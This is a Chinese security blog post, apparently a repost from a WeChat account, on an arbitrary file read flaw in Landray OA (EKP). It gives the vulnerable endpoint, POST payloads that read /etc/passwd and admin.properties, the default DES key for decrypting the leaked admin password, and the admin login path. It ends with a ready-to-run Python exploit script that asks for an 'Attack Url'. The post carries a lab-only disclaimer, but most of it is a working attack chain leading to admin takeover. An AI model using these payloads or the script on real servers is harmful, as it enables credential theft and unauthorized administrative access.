蓝凌OA任意文件读取漏洞

admin 2022年11月16日11:19:32安全文章评论18 views1875字阅读6分15秒阅读模式
蓝凌OA任意文件读取漏洞
    文章声明

安全技术类文章仅供参考,此文所提供的信息仅针对漏洞靶场进行渗透,未经授权请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
本文所提供的工具仅用于学习,禁止用于其他目的,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全

一、漏洞描述

深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用该漏洞获取服务器敏感信息。

二、漏洞复现

访问以下接口

/sys/ui/extend/varkind/custom.jsp

蓝凌OA任意文件读取漏洞

根据返回页面可以看到是存在该接口的

然后抓包并修改为POST方式,并加上payload

var={"body":{"file":"file:///etc/passwd"}}  针对linux服务器var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}  针对windows服务器

蓝凌OA任意文件读取漏洞

蓝凌OA任意文件读取漏洞

通过对比可以知道不要试完payload读不出来就放弃了,觉得它不存在这个漏洞,说不定这个服务器是在windows上呐。

这里读取的admin.properties配置文件可以泄露系统后台的密码

由于蓝凌OA默认是DES加密,且 默认密钥为 kmssAdminKey,所以只要拿着响应中的password值进行解密就好(返回的password字符串去掉末尾的/r再进行解密)

DES解密

http://tool.chacuo.net/cryptdes/

蓝凌OA任意文件读取漏洞

得到密码之后即可访问后台以管理员身份登入系统

http://xx.xx.xx.xx/admin.do

蓝凌OA任意文件读取漏洞

蓝凌OA任意文件读取漏洞

三、POC脚本

漏洞利用脚本如下

#!/usr/bin/python3#-*- coding:utf-8 -*-import base64import requestsimport randomimport reimport jsonimport sys
def title(): print('+------------------------------------------') print('++++++ 公众号: 守卫者安全 ') print('++++++ POC名称: 蓝凌OA 任意文件读取POC ') print('++++++ 使用方法: python3 poc.py ') print('++++++ Url >>> http://xxx.xxx.xxx.xxx ') print('+------------------------------------------')
def POC_1(target_url): vuln_url = target_url + "/sys/ui/extend/varkind/custom.jsp" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36","Content-Type": "application/x-www-form-urlencoded"} data = 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}' #proxies = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'} try: response = requests.post(url=vuln_url, data=data, headers=headers, verify=False) print("正在请求 {}/sys/ui/extend/varkind/custom.jsp ".format(target_url)) if "password" in response.text and response.status_code == 200: print("成功读取 admin.properties 响应为:{} ".format(response.text))
except Exception as e: print("请求失败:{} ".format(e)) sys.exit(0)
#if __name__ == '__main__': title() target_url = str(input("Please input Attack Url >>> ")) POC_1(target_url)

蓝凌OA任意文件读取漏洞

原文始发于微信公众号(守卫者安全):蓝凌OA任意文件读取漏洞

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月16日11:19:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  蓝凌OA任意文件读取漏洞 http://cn-sec.com/archives/1412753.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: